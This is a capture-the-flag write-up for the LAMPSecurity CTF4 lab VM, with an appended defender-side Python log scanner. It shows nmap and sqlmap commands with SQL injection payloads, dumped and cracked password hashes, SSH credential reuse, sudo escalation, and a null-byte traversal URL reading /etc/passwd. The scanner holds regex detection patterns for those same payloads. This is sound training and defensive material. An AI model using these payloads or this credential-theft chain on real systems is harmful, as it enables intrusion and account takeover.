LAMPSecurity: CTF4
Posted on 29 Aug 2014 in security • 4 min read
I start the LAMPSecurity CTF4 challenge from VulnHub, available here. The goal is to get a root shell on the server.
Discovery
First of all we need to determine the IP address of the server.
Since we launch it in a bridged virtual machine, the local router recorded the IP address in its DHCP logs; we simply take the most recent one. For me it is 192.168.1.56.
Nmap
Let's start with a simple nmap scan:
#nmap -A -oA ctf4 192.168.1.56
Nmap 6.47 scan initiated Thu Aug 28 18:49:49 2014 as: nmap -A -oA ctf4 192.168.1.56
Nmap scan report for 192.168.1.56
Host is up (0.00058s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 10:4a:18:f8:97:e0:72:27:b5:a4:33:93:3d:aa:9d:ef (DSA)
|_ 2048 e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4 (RSA)
25/tcp open smtp Sendmail 8.13.5/8.13.5
| smtp-commands: ctf4.sas.upenn.edu Hello [192.168.1.97], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.5 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.2.0 ((Fedora))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 5 disallowed entries
|_/mail/ /restricted/ /conf/ /sql/ /admin/
|_http-title: Prof. Ehks
631/tcp closed ipp
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (98%), Linux 2.6.13 - 2.6.32 (96%), Control4 HC-300 home controller (96%), Lantronix SLC 8 terminal server (Linux 2.6) (96%), SNR SNR-S2960 switch (95%), SonicWALL Aventail EX-6000 VPN appliance (94%), Linux 2.6.8 - 2.6.30 (94%), Dell iDRAC 6 remote access controller (Linux 2.6) (94%), Linux 2.6.9 - 2.6.18 (94%), Linux 2.6.18 - 2.6.32 (94%)
No exact OS matches for host (test conditions non-ideal)
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
The scan gives us the list of available services:
- an SSH service on port 22
- a mail service (Sendmail) on port 25
- a web service on port 80; note that there are five disallowed entries in robots.txt
- and a closed CUPS service on port 631.
The website
Let's take a look at the web site. It is a simple blog site with an XSS flaw in the search engine.
The articles are indexed with a GET parameter id. This parameter is vulnerable to SQL injection.
Exploitation
Sqlmap
We launch sqlmap:
#sqlmap -u 'http://192.168.1.56/index.html?page=blog&title=Blog&id=6' -p id --tables
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=6 AND 2396=2396
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=6 UNION ALL SELECT NULL,CONCAT(0x7172756f71,0x494c647a675a47595a55,0x7178657471),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page=blog&title=Blog&id=6 AND SLEEP(5)
---
[19:44:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[19:44:24] [INFO] fetching database names
[19:44:24] [INFO] fetching tables for databases: 'calendar, ehks, information_schema, mysql, roundcubemail, test'
Database: calendar
[5 tables]
+---------------------------------------+
| phpc_calendars |
| phpc_events |
| phpc_sequence |
| phpc_users |
| uid |
+---------------------------------------+
Database: roundcubemail
[6 tables]
+---------------------------------------+
| session |
| cache |
| contacts |
| identities |
| messages |
| users |
+---------------------------------------+
Database: ehks
[3 tables]
+---------------------------------------+
| user |
| blog |
| comment |
+---------------------------------------+
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Okay, so there are a lot of databases; let's dump the ehks user table:
# sqlmap -u 'http://192.168.1.56/index.html?page=blog&title=Blog&id=6' -p id -D ehks -T user --dump
+---------+-----------+----------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+----------------------------------+
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 |
| 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f |
+---------+-----------+----------------------------------+
Cracking the hashes
We save the hashes in a file (an option sqlmap proposes) and launch John the Ripper on it:
#john hashes --format=raw-md5
sorzek:pacman
jdurbin:Sue1978
2 password hashes cracked, 4 left
We test the cracked passwords on:
- the restricted part: there are two text files about how to blog and how to use the webmail
- the admin part: with the two cracked accounts we can only write new articles, which is not really useful for our CTF
- the mail part: according to the instructions in the restricted part, we can access the users' emails from here.
We found in an email from sorzek to ghighland that he just adds a number to his usual password "undone", so we tell john to try passwords from undone0 to undone9999. We cracked another password:
ghighland:undone1
SSH connections
Okay, the same password seems to be used everywhere, and I was a bit lost about how to continue, so I tried the credentials on the SSH service: it works!
First of all I logged in with the jdurbin account. There did not seem to be anything useful, but while searching I saw that achen had an SSH private key readable by everyone (a ppk one, for PuTTY). Okay, let's use it to connect to the machine. It asks for no password and we get a shell; what now?
Privilege escalation
I tried to see what the differences were with this account and I saw a PDF file "linux_administration.pdf", so I tried the sudo command with sudo -v and, once again: it works!
So a simple sudo su gives us root rights.
DONE!
Summary
Let's summarize:
- exploitation of the SQL injection
- cracking of the hashes
- use of the credentials on the SSH service
- discovery of the ppk SSH key
- use of it to connect to the achen account
- sudo su
That was an easy one!
Nota bene
Oh yeah, we did not explore the lead of the file inclusion in the page GET parameter:
http://192.168.1.56/index.html?page=../../../../../../etc/passwd%00&title=Blog&id=5
Moreover, the root password "root1234" is in the bash_history of achen.
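As an added defender-side example (not part of the original write-up), the following Python script parses Apache access-log lines carrying the sqlmap payloads from the exploitation section and the traversal URL from this note, and flags the parameter each one abuses; the log lines, rule names and regexes are my own constructed assumptions.

```python
# Added example (not from the original write-up): flag the sqlmap payloads and
# the traversal attempt from this page in constructed Apache access-log lines.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log (combined format); 192.168.1.56 is the CTF host.
SAMPLE_LOG = """\
192.168.1.97 - - [28/Aug/2014:19:44:20 +0200] "GET /index.html?page=blog&title=Blog&id=6 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.97 - - [28/Aug/2014:19:44:24 +0200] "GET /index.html?page=blog&title=Blog&id=6%20AND%202396%3D2396 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
192.168.1.97 - - [28/Aug/2014:19:44:25 +0200] "GET /index.html?page=blog&title=Blog&id=6%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7172756f71%2C0x494c647a675a47595a55%2C0x7178657471%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 5200 "-" "sqlmap/1.0"
192.168.1.97 - - [28/Aug/2014:19:44:26 +0200] "GET /index.html?page=blog&title=Blog&id=6%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
192.168.1.97 - - [28/Aug/2014:19:50:01 +0200] "GET /index.html?page=../../../../../../etc/passwd%00&title=Blog&id=5 HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3}')

# Each rule is applied to the decoded value of every query parameter.
RULES = [
    ("sqli-boolean", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("sqli-time", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("lfi-traversal", re.compile(r"(\.\./){2,}|%00|\x00")),
]

def classify_request(url):
    """Return sorted (parameter, rule) pairs that fire for one request URL."""
    hits = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        decoded = unquote(value)  # second pass catches double-encoded input
        for rule, pattern in RULES:
            if pattern.search(decoded):
                hits.add((name, rule))
    return sorted(hits)

def scan_log(text):
    """Return (source ip, parameter, rule) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        for param, rule in classify_request(m.group("url")):
            findings.append((m.group("ip"), param, rule))
    return findings

if __name__ == "__main__":
    for ip, param, rule in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{param}\t{rule}")
```

The same rules would have flagged the boolean, UNION and time-based probes on id as well as the null-byte traversal on page, which is exactly the traffic a WAF or log review should surface before the database dump happens.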